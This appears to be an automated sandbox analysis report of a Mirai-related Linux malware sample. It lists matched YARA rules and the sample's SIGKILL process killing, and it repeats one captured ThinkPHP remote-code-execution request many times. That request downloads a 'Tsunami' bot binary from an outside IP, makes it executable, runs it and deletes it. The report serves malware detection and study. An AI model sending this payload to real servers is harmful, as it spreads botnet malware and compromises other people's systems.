    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
    Source: 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
    Sample tries to kill multiple processes (SIGKILL)
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 800, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 847, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 884, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1389, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1633, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1809, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 1983, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2048, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2069, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 2102, result: successful
    Source: LOAD without section mappingsProgram segment: 0x100000
    Source: VC3SWrkssz, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
    Source: 6228.1.000000008254e41a.0000000043337d44.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6223.1.000000008254e41a.0000000043337d44.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
    Source: 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
    Source: 6228.1.0000000051b72c78.000000009a6fa781.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 720, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 759, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 761, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 788, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 797, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 799, result: successful
    Source: /tmp/VC3SWrkssz (PID: 6241)SIGKILL sent: pid: 800, result: successful
